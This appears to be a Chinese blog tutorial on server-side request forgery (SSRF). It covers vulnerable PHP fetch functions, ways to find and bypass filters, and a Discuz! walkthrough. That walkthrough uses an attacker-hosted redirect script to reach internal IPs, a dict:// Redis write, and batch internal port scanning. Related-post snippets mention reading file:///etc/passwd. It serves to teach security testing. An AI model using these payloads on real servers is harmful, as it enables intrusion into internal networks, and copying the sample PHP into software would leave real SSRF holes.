SSRF

最新推荐文章于 2023-09-20 11:38:10 发布
最新推荐文章于 2023-09-20 11:38:10 发布
阅读量2.3k 收藏 1
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Le0nis/article/details/52127550
版权

SSRF

0x00 介绍

ssrf:
服务端请求伪造:是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞
作用:
用来访问外部网络无法访问的内网系统

0x01 威胁

  • 扫描内部网络
  • 向内部任意主机的任意端口发送精心构造的数据包(payload)
  • DOS(请求大文件、始终保持keep-Alive Always)
  • 暴力穷举(users/dirs/files)

0x02 成因

服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制
比如从指定url地址获取网页文本内容、加载指定地址的图片,下载等

PHP相关函数

file_get_content()

<?php
if (isset($_POST['url'])) 
{ 
$content = file_get_contents($_POST['url']); 
$filename ='./images/'.rand().';img1.jpg'; 
file_put_contents($filename, $content); 
echo $_POST['url']; 
$img = "<img src=\"".$filename."\"/>"; 
} 
echo $img; 
?>

curl_exec() 

<?php 
if (isset($_POST['url']))
{
$link = $_POST['url'];
$curlobj = curl_init();
curl_setopt($curlobj, CURLOPT_POST, 0);
curl_setopt($curlobj,CURLOPT_URL,$link);
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($curlobj);
curl_close($curlobj);

$filename = './curled/'.rand().'.txt';
file_put_contents($filename, $result); 
echo $result;
}
?>

fsockopen() 

<?php 
function GetFile($host,$port,$link) 
{ 
$fp = fsockopen($host, intval($port), $errno, $errstr, 30); 
if (!$fp) { 
echo "$errstr (error number $errno) \n"; 
} else { 
$out = "GET $link HTTP/1.1\r\n"; 
$out .= "Host: $host\r\n"; 
$out .= "Connection: Close\r\n\r\n"; 
$out .= "\r\n"; 
fwrite($fp, $out); 
$contents=''; 
while (!feof($fp)) { 
$contents.= fgets($fp, 1024); 
} 
fclose($fp); 
return $contents; 
} 
}
?>

0x03 利用限制(以下情况不能利用)

  • 服务器端开启openssl
  • 服务器需要信息验证(账号、密码、cookie)

0x04 利用方式

  • 对外网、服务器所在内网、本地进行端口扫描,获取一些banner信息
  • 攻击运行在内网或本地的应用程序
  • 对内网web应用进行指纹识别,通过访问默认文件
  • 攻击内外网的web应用,主要使用get参数
  • 使用file协议读取本地文件

0x05 寻找

1、从web功能上寻找

  • 能够对外发起网络请求的地方

  • 从远程服务器请求资源(upload from URL,import & Export RSS feed)

    • Upload from URL:
    • Discuz
    • Import & Export RSS feed:
    • web Blog
    • 使用了XML引擎的地方:
    • Wordpress xmlrpc.php

  • 数据库内置功能(Oracle,MongoDB,MSSQL,Postgres,CouchDB,Redis)

  • webmail 收取其它邮箱邮件

  • 文件处理,编码处理,属性信息处理

详情关注猪猪侠ppt

2、从url关键字中寻找 

share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain

利用google hack

0x06 漏洞验证

基本判断(排除法)
查看发送数据包的情况,ssrf是由服务端发起的请求,如果存在ssrf漏洞 那么我们本地浏览器中将不存在对该图片的请求。

验证是否可以探测内网
找存在http服务的内网地址

  • 从漏洞平台中的历史漏洞寻找泄露的内网地址
  • 通过子域名暴力破解工具模糊猜测内网地址

0x07 过滤绕过

http://10.10.116.11 -> http://t.cn/RwbLKDx
  • 端口绕过 
http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.50.33.43:8080/
  • xip.io
url=http://www.10.10.10.10.xip.io
  • 通过跳转
<?php
Header("HTTP/1.1 301 Moved Permanently");
Header("Location: http://www.icoa.cn");
?>

Discuz! SSRF


/forum.php?mod=ajax&action=downremoteimg&message=[img]http://远程主机地址/302.php?helo.jpg[/img]

302.php


<?php 
header("Location: dict://10.0.0.1:6379/set:1:helo"); # set 1

0x08 实例演示

  • Discuz ssrf
    首先Discuz
    source/module/forum/forum_ajax.php文件
} elseif($_GET['action'] == 'downremoteimg') { $_GET['message'] = str_replace(array("\r", "\n"), array($_GET['wysiwyg'] ? '<br />' : '', "\\n"), $_GET['message']); preg_match_all("/\[img\]\s*([^\[\<\r\n]+?)\s*\[\/img\]|\[img=\d{1,4}[x|\,]\d{1,4}\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/is", $_GET['message'], $image1, PREG_SET_ORDER); preg_match_all("/\<img.+src=('|\"|)?(.*)(\\1)([\s].*)?\>/ismUe", $_GET['message'], $image2, PREG_SET_ORDER); $temp = $aids = $existentimg = array(); if(is_array($image1) && !empty($image1)) { foreach($image1 as $value) { $temp[] = array( '0' => $value[0], '1' => trim(!empty($value[1]) ? $value[1] : $value[2]) ); } } if(is_array($image2) && !empty($image2)) { foreach($image2 as $value) { $temp[] = array( '0' => $value[0], '1' => trim($value[2]) ); } } require_once libfile('class/image'); if(is_array($temp) && !empty($temp)) { $upload = new discuz_upload(); $attachaids = array(); foreach($temp as $value) { $imageurl = $value[1]; $hash = md5($imageurl); if(strlen($imageurl)) { $imagereplace['oldimageurl'][] = $value[0]; if(!isset($existentimg[$hash])) { $existentimg[$hash] = $imageurl; $attach['ext'] = $upload->fileext($imageurl); if(!$upload->is_image_ext($attach['ext'])) { continue; } $content = ''; if(preg_match('/^(http:\/\/|\.)/i', $imageurl)) { $content = dfsockopen($imageurl); } elseif(preg_match('/^('.preg_quote(getglobal('setting/attachurl'), '/').')/i', $imageurl)) { $imagereplace['newimageurl'][] = $value[0]; }

content=dfsockopen( imageurl);
处,直接可以传入URL,造成SSRF

构造
通过构造一个远程的伪图片

172.16.77.145/discuz/upload/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://le0nis.xyz/1.php?xxx.jpg[/img]

1.php

<?php
Header("Location:http://172.16.77.145");
?>

我们让其301到一个内网ip的80端口,然后根据整个请求完成的时间不同来判定该服务是否存在,构造链接如下 

172.16.77.145/discuz/upload/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://le0nis.xyz/1.php?s=http&ip=172.16.77.147&port=80&data=helo.jpg[/img]

1.php接收我们的参数

<?php
Header("Location:".$_GET['s']."://".$_GET['ip'].":".$_GET['port']."/".$_GET['data']);
?>

这样就构成了一个探测内网的批量程序

我们可以写脚本处理

Le0nis
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包 可以看到avatar的一个参数,采用的是请求其他地方的图片,此时我们对这条URL进行修改 凭借dnslog并用#注释掉后面的URL地址 发现这边收到了请求 此时查看...
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
html%3cstript%3e标签,如何使用AJAX表单验证URL字段
weixin_36219784的博客
07-03 2579
这些标记不是有效的/标准的HTML标记:输入=“ url”pattern =“ https?://.+”必需的像这样编写您的html输入:(您要为其命名的dlink或网站!?)然后,您必须首先在服务器端仔细验证/控制所有输入,因此在my_parse_file.php://unescape data if magic quotes is activatedfunction strip(&$s...
生命在于学习——SSRF漏洞
易水哲的博客
08-23 1982
本篇文章是关于SSRF的学习笔记
ssrf总结
weixin_44576725的博客
05-01 1580
SSRF总结 简介 服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。SSRF可以对外网、服务器所在内网、本地进行端口扫描,攻击运行在内网或本地的应用,或者利用File协议读取本地文件。 原理 SSRF漏洞形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如,黑客操作服务端从
SSRF漏洞(利用file协议读取本地文件)
最新发布
Battery的博客
09-20 6万+
当利用SSRF漏洞时,攻击者可以通过构造恶意请求来读取本地文件。其中一种方法是使用file协议来读取本地文件。例如,file:///etc/passwd是一个常见的示例,它用于读取Linux系统上的passwd文件。passwd文件是Linux系统中用于存储用户账户信息的文件,其中包含了所有用户的用户名、密码和相关配置信息。攻击者可以利用SSRF漏洞,构造一个恶意的请求,通过服务端向file:///etc/passwd发送请求,从而读取该文件的内容。。
漏洞原理——ssrf
Innocence_0的博客
07-19 595
SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用一个网络请求的服务,当作跳板进行攻击。攻击者利用了可访问Web服务器(A)的特定功能 构造恶意payload;
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
ssrf-king:用于burp的SSRF插件可在所有请求中自动进行SSRF检测
03-07
:fire: 自卫队 :fire:v1.12最新burp的SSRF插件,可在所有请求中自动进行SSRF检测 如果您遇到任何问题或想要下面未列出的新功能,请在此表格中创建一个新的问题即将发布的功能清单 :check_mark: 它将很快有一个用户...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描
weixin_48799157的博客
03-31 6913
小白一个,记录解题过程,如有错误请指正! 补充知识点: 1.什么是SSRF SSRF(Server-Side Request Forgery:服务器跨站请求),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内网。也就是说可以利用一个网络请求的服务,当作跳板进行攻击) 2.SSRF产生的原因 SSRF 形成的原因往往是由于服务端提供了从其他服务器应用...
Discuz3.4-SSRF-从触发点到构造payload
weixin_34121282的博客
04-28 672
目录 SSRF逆向分析 0x00 前言 0x01 收集情报 0x02 尝试逆向找到触发点 0x03 尝试构造payload 0x04 总结 SSRF逆向分析 0x00 前言 之前有复现过一些漏洞,但是每次按照别人的思路...
常见漏洞之SSRF
m0_52923241的博客
03-25 473
简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 原理:由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。这个功能若被恶意使用,可利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 危害: 1、可以对服务器所在的内网、本地进行端
网络安全-SSRF漏洞原理、攻击与防御
关注网络安全、云原生安全
09-05 2万+
概述 SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统(因为他是从内部系统访问的,所以它能够请求到与它相连而与外网隔离的内部系统。)。 原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档等等。SSRF漏洞通过篡改获取资源的请求发送给服务器(服...
SSRF漏洞原理解析
未完成的歌~的博客
02-03 6458
文章目录0x01 基础知识1、SSRF漏洞简介:2、主要攻击方式:3、漏洞形成原理:4、漏洞的危害:0x02 漏洞检测1、漏洞验证:2、漏洞的可能出现点:0x03 绕过方法:1、绕过限制为某种域名:2、绕过限制请求IP不为内网地址:3、限制请求只为http协议:0x04 漏洞利用1、产生漏洞的函数:2、漏洞靶场:0x05 如何防御SSRF 0x01 基础知识 1、SSRF漏洞简介: SSRF全称:Server-Side Request Forgery,即 服务器端请求伪造,是一个由攻击者构造请求 在目标服务
SRC挖洞之SSRF与XXE漏洞的实战案例
道阻且长,行则将至。
05-31 2027
文章目录前言SSRF漏洞案例1 某翻译网SSRF可通内网案例2 某翻译网SSRF防护绕过案例3 某站SSRF读取本地文件案例4 某站视频解析导致SSRF案例5 某狗主站SSRF多种绕过案例6 某乎网SSRF可探测内网XXE漏洞案例1 用友某软件存在XXE漏洞案例2 XFire 开发组件XXE漏洞案例3 博客搬家功能处XXE漏洞案例4 用友某软件存在XXE盲注总结 前言 前面一篇文章 SRC挖洞之文件上传/下载漏洞的实战案例 介绍了 任意文件下载漏洞 和 任意文件上传漏洞,本文收集讲述下 SSRF 漏洞和 X
WordPress 4.4 SSRF
乐枕的家
08-22 2729
通过这个漏洞熟悉一下WP的代码。数据跟踪[xmlrpc.php] 获取POST的数据$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );创建xmlrpc_server,使用serve_request()方法处理输入。$wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_cl
SSRF最全总结(协议,绕过)
weixin_50464560的博客
01-13 9834
https://www.anquanke.com/post/id/262430#h3-46   SSRF-Labs配置 有些初学者喜欢用这个靶场,讲下怎么搭建 我用的是Ubuntu18;docker和docker-compose配置可以参考vulhub官网的配置;下面是谷歌搜的 $ curl -sSL https://get.docker.com/ | sh #脚本安装docker $ apt install docker-compose #安装docker compose Basic关和
CTFHub技能树web(持续更新)--SSRF--伪协议读取文件
jiuyongpinyin的博客
01-27 2220
伪协议读取文件 这里我们先来了解一下SSRF中的URL的伪协议: file:/// dict:/// sftp:// ldap:// tftp:// gopher:// 然后通过题目给我们的提示,我们读取web目录下的文件,一般网站的目录都放在www/html/目录下,其实如果看过我之前的结题,在文件上传的题目里,我们使用蚁剑连接后就能够看到目录,所以我们直接构造url: ?url=file:///var/www/html/flag.php 发现只有三个问号,这里需要查看一下网页源代码,当然也可以只
ssrf redis
08-29
SSRF (Server Side Request Forgery) 是一种攻击方式,通过欺骗服务器发起伪造的请求来访问受信任的内部资源。Redis 是一种流行的开源内存数据库。 如果你想通过 SSRF 进行 Redis 的攻击,可能的方式包括: 1. 访问 Redis 未授权的端口:Redis 默认监听在 6379 端口,如果你能够通过 SSRF 访问到该端口,并且 Redis 没有进行适当的身份验证和授权配置,那么你可能能够执行一些恶意操作,如读取或修改 Redis 中的数据。 2. 利用 Redis 的特殊功能:Redis 提供了一些特殊功能和命令,如远程代码执行、文件系统访问等。如果你能够通过 SSRF 发起有效的 Redis 命令,可能会导致服务器执行恶意操作。 需要注意的是,SSRF 攻击是一项严重的安全问题,可以导致数据泄漏、远程代码执行等风险。为了保护系统安全,建议在开发和部署过程中采取适当的安全措施,如限制服务器对内部资源的访问、使用防火墙、进行身份验证和授权等。同时,定期更新和修补软件漏洞也是很重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值